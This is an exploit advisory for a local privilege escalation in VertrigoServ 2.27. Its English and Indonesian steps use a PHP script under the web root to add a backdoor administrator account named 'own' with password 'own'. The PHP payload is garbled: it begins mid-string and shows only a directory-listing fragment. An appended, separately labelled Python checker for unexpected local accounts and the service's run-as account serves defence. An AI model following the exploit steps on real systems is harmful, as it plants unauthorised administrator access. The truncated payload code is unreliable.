=====================================================
 Vertrigoserv 2.27 Local Privilege Escalation Exploit
=====================================================

:---------------------------------------------------------------------------:
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit
: # Date          : May 19th 2012
: # Author        : X-Cisadane
: # Software Link : http://vertrigo.sourceforge.net/
: # Version       : 2.27
: # Category      : Desktop (Windows) Applications
: # Platform      : Win32
: # Vulnerability : Local Privilege Escalation Exploit
: # Tested On     : Windows XP Professional Service Pack 3
: # Greetz to     : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:---------------------------------------------------------------------------:

Proof Of Concept :
================

[ENGLISH]
1. Run VertrigoServ
2. Create a file named script.php in X:\VertrigoServ Installation Directory\www\
3. Fill script.php with this script & save!

    full privileges successfully added";exit;}
    echo "";
    // List the entries of the opened directory, escaping each name for output
    while (false !== ($qQr = readdir($qQd))){
        switch(filetype($qQa.$qQr)) {
            case "dir":
                echo "".htmlspecialchars($qQr)."\n";
                break;
            case "file":
                echo "".htmlspecialchars($qQr)."\n";
                break;
        }
    }
    ?>

4. Open your browser & go to http://localhost/script.php?qQx
5. If successful, it will show this message : User own -> full privileges successfully added
6. Now, open Command Prompt and type Net User then press enter! It will show a new user (own) & the password is own.

[INDONESIAN]
1. Run VertrigoServ
2. Create a file named script.php in X:\Directory where VertrigoServ is installed\www\
3. Fill the file script.php with the following script & save!
4. Open your browser, go to http://localhost/script.php?qQx
5. If successful, this message will appear : User own -> full privileges successfully added
6. Now open Command Prompt and type Net User then press enter! A new user named own with the password own will then appear.
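
Added example (not part of the original advisory and not the author's code): a defender-side check for the outcome shown in step 6. It parses Net User output, reports accounts missing from a known-good baseline, and reads the account a web server service runs as from `sc qc` output. Assumptions: the 25-character column layout, and the constructed host name LABXP, service name ExampleApache and baseline list.

```python
import re

COL = 25  # assumption: `net user` lays account names out in 25-character columns

def parse_net_user(output):
    """Return the account names listed in `net user` output."""
    names, in_list = [], False
    for line in output.splitlines():
        if set(line.strip()) == {"-"}:      # dashed rule opens the listing
            in_list = True
            continue
        if not in_list or not line.strip():
            continue
        if line.startswith("The command completed"):
            break
        # Slice by column instead of split(): account names may contain spaces.
        for i in range(0, len(line), COL):
            name = line[i:i + COL].strip()
            if name:
                names.append(name)
    return names

def unexpected_accounts(output, baseline):
    """Accounts present now but missing from the baseline (case-insensitive)."""
    known = {b.lower() for b in baseline}
    return [n for n in parse_net_user(output) if n.lower() not in known]

def service_account(sc_qc_output):
    """Account a service runs as, read from `sc qc <service>` output."""
    m = re.search(r"SERVICE_START_NAME\s*:\s*(.+)", sc_qc_output)
    return m.group(1).strip() if m else None

# Constructed sample data: host, service name and baseline are hypothetical.
SAMPLE_NET_USER = "\n".join([
    "", r"User accounts for \\LABXP", "", "-" * 79,
    "Administrator".ljust(COL) + "Guest".ljust(COL) + "Lab User".ljust(COL),
    "own".ljust(COL) + "SUPPORT_388945a0".ljust(COL),
    "The command completed successfully.",
])
BASELINE = ["administrator", "Guest", "Lab User", "SUPPORT_388945a0"]
SAMPLE_SC_QC = "SERVICE_NAME: ExampleApache\n        SERVICE_START_NAME : LocalSystem\n"

if __name__ == "__main__":
    for name in unexpected_accounts(SAMPLE_NET_USER, BASELINE):
        print("unexpected local account:", name)
    acct = service_account(SAMPLE_SC_QC)
    if acct and acct.lower() in ("localsystem", r"nt authority\system"):
        print("web server service runs as", acct, "- scripts it serves inherit that")
```

Running the web server service under a dedicated low-privilege account removes the rights a script under www\ would otherwise inherit.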